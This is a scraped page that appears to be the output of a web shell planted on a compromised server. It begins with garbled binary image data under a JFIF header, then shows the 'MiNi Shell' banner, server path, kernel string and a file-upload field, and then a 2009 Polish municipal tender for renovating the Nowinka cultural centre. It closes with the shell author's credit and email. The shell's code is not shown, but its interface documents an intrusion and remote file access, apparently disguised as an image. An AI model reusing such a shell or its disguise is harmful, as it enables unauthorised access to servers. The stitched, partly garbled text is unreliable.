JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090812/276800-N-2009.html

<p class="kh_header"><b>Nowinka: Przebudowa budynku Gminnego Ośrodka Kultury oraz wykonanie elewacji wraz z ociepleniem w ramach modernizacji budynku.</b><br>
<b>Numer ogłoszenia: 276800 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Nowinka , 16-304 Nowinka, woj. podlaskie, tel. 087 6419520, 6419541, faks 087 6419660.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku Gminnego Ośrodka Kultury oraz wykonanie elewacji wraz z ociepleniem w ramach modernizacji budynku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty budowlane
1.	Demontaż pokrycia dachowego z płyt azbestowo-cementowych i utylizacja -51,6 m2
2.	Ocieplenie stropu poddasza wełną mineralną gr. 20 cm - 310,2 m2
3.	Rozebranie istniejących okładzin podłogowych i wykonanie w to miejsce posadzki z płytek gress 163,513 m2 plus schody 14,229 m2 i ułożenie okładzin z tworzyw sztucznych -wykładziny tekstylne -145,402 m2.
4.	Rozebranie obicia ścian z desek 277,29 m2.
5.	Przebudowa ścianek działowych 
6.	Wykonanie ścianek działowych z profili aluminiowych  14,049 m2.
7.	Wykonanie gładzi gipsowych ścian i malowanie farbami emulsyjnymi 1338,655 m2.
8.	Wykonanie gładzi gipsowych stropów i malowanie farbami emulsyjnymi 611,94 m2.
9.	Wymiana okien na okna z PCV 13,282 m2 - 8 szt.
10.	Wymiana drzwi drewnianych na aluminiowe 9,27 m2 - 3 szt.
11.	Wymiana ościeżnic i drzwi drewnianych  5 szt. - 9,225 m2.
12.	Wykonanie ocieplenia ścian metodą lekką mokrą  styropianem o gr. 14 cm - 459,777 m2  i styropianem 10 cm 25,63 m2 plus ościeże 45,71 m2. 
13.	Wykonanie obróbek blacharskich 16,696 m2.
14.	Wykonanie chodnika z płytek betonowych 35 x 35 cm 5,865 m2.
Instalacje sanitarne
1	Demontaż rurociągów stalowych instalacji c.o. 173 mb i wykonanie rurociągów miedzianych (różnych średnic) - 164 mb
2.	Demontaż grzejników żeliwnych 27 szt. Montaż grzejników c.o  - stalowe płytowe z zaworami termostatycznymi - 33 szt.
3.	Demontaż kotła żeliwnego i wyposażenia kotłowni. Wykonanie węzła cieplnego z kotłem żeliwnym olejowym o mocy cieplnej do 56 kW, zbiornikiem na olej opałowy 2000 dm3  i zasobnikiem c.w.u  pojemności 300 l.
4.	Wykonanie wkładu kominowego ze stali nierdzewnej sr. 120 mm. wys. 7,5 m.
5.	Demontaż rurociągów stalowych  instalacji wodociągowej 29 mb. Wykonanie nowych rurociągów stalowych (stal ocynkowana) 73 mb.
6.	Demontaż żeliwnych rur kanalizacyjnych 30 mb.i wykonanie rurociągów z PCV 37 mb.
7.	Wymiana baterii umywalkowych  4 szt.
8.	Wymiana osprzętu zlewozmywak 1 szt, umywalka 3 szt, ustępy 3 szt. Instalacja brodzika natryskowego 1 szt
Instalacje elektryczne
1.	Montaż obudowy tablicy rozdzielczej - 2 szt.
2.	Montaż wyposażenia rozdzielnic w tym :wyłącznik dilos 0 40 A-4p - 2 szt, wyłącznik róż. P-304 80 A-30 mA - 2 szt, wyłącznik róż. P-302 AC 25-30 mA - 21 szt, wył. inst. S-301 B-16 A -  21 szt, wył. inst. S-303 B16 A - 10 szt, 
3.	Wykucie bruzd dla rur winidurowych - 550 mb.
4.	Montaż przewodów instalacyjnych 678 mb.
5.	Montaż gniazd wtyczkowych 54 szt, wyłączników i przełączników 38 szt., opraw świetlówkowych 65 szt, opraw żarowych 19 szt., i wentylatorów ściennych 6 szt
6.	Wykonanie pomiarów instalacji.
Szczegółowy zakres robót zawierają: projekt techniczny, szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych i przedmiar robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.33.11.00-7, 45.33.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy P.z.p. oraz spełniają warunki określone w art. 22 ust. 1 pkt 1-3 ustawy P.z.p. 
2.	Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej
3.	Minimalny okres gwarancji na wykonane roboty wyniesie 3 lata.
Ocena spełniania warunków dokonana zostanie metodą spełnia-nie spełnia. Nie spełnienie któregokolwiek  z warunków spowoduje wykluczenie oferenta z postępowania i odrzucenie złożonej przez niego oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie o nie podleganiu wykluczeniu z postępowania FORMULARZ NR 2 na podstawie art. 24 ust. 1 i ust. 2 pkt 1 w związku z art. 22 ust. 1 pkt 4 ustawy Prawo Zamówień Publicznych.
2.	Oświadczenie o spełnieniu warunków FORMULARZ NR 2 określonych w art. 22 ust. 1 pkt 1-3 ustawy Prawo Zamówień Publicznych.
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Wykaz wykonanych robót budowlanych FORMULARZ NR. 5 w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (wykazana robota musi być rozpoczęta i zakończona w tym okresie). Wykonawca musi wykazać, że zrealizował co najmniej jedno zadanie o zbliżonym zakresie robót o wartości nie mniejszej niż 100 tyś. zł. W zakresie wykonanych robót musi znajdować się wykonanie izolacji budynku metodą lekką mokrą. Doświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia: Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w warunek. Do zestawienia muszą być dołączone dokumenty potwierdzające, że w/w roboty budowlane zostały wykonane należycie (protokoły odbioru, referencje itp.), z podaniem ich wielkości i wartości, daty i miejsca wykonania, oraz informacją na temat odbiorców tych robót (nazwa, adres, numer telefonu).  Wykaz wykonanych robót musi być zgodny z wielkościami wynikającymi z załączonych dokumentów. Zamawiający nie uzna wykazanych robót budowlanych, jeżeli z załączonych dokumentów nie będzie wynikało jednoznacznie, że roboty w podanym w wykazie, zostały wykonane należycie i wartość każdej z tych robót odpowiada warunkom wymienionym wyżej.
5.	 Wykaz personelu FORMULARZ NR 3  , który będzie uczestniczyć w wykonywaniu zamówienia wraz z załączonymi dokumentami potwierdzającymi, że osoby te posiadają wymagane uprawnienia określone w przepisach prawa budowlanego odpowiednio do zakresu przedmiotu zamówienia Zamawiający wymaga, aby Wykonawca dysponował osobami posiadającymi niżej wymienione specjalności budowlane:  Wykonawca przedstawi w ofercie  minimum jedną osobę w każdej z niżej wymienionych branż posiadającą uprawnienia budowlane - wykonawcze w zakresie:
Konstrukcji budowlanych 
Instalacji sanitarnych w zakresie węzłów cieplnych i instalacji wod-kan.
Instalacji elektrycznych.  
6.	Dokumenty dotyczące usuwania płyt azbestowo-cementowych FORMULARZ  NR 4 , wykaz posiadanych uprawnień i decyzji administracyjnych i umów na prace, składowanie, transport materiałów zawierających azbest oraz wykaz pracowników przewidzianych do pracy przy demontażu eternitu. Do wykazu dołączyć kserokopie decyzji zatwierdzającej program gospodarowania odpadami niebezpiecznymi oraz dokumenty potwierdzające dysponowanie pracownikami (min. 2 osoby) przeszkolonymi w zakresie bezpiecznego usuwania materiałów zawierających azbest.
7.	Polisa ubezpieczeniową potwierdzającą fakt posiadania ubezpieczenia z tytułu prowadzonej działalności gospodarczej.
8.	Kosztorysy ofertowe sporządzone metodą szczegółową, niezbędne do rozliczenia inwestycji z dysponentem środków finansowych Unii Europejskiej.
9.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, wtedy zobowiązani są załączyć do wniosku o dopuszczenie do udziału w postępowaniu dokument wskazujący ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie upoważnionych wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
10.	Oferta musi zawierać wszystkie informacje wymienione w FORMULARZU NR 1 -Wzór oferty
Ww. dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r.w sprawie rodzaju dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87, poz. 605)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.nowinka.wrotapodlasia.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nowinka. 16-304; Nowinka 33.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 10:00, miejsce: Urząd Gminy Nowinka. 16-304; Nowinka 33 -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com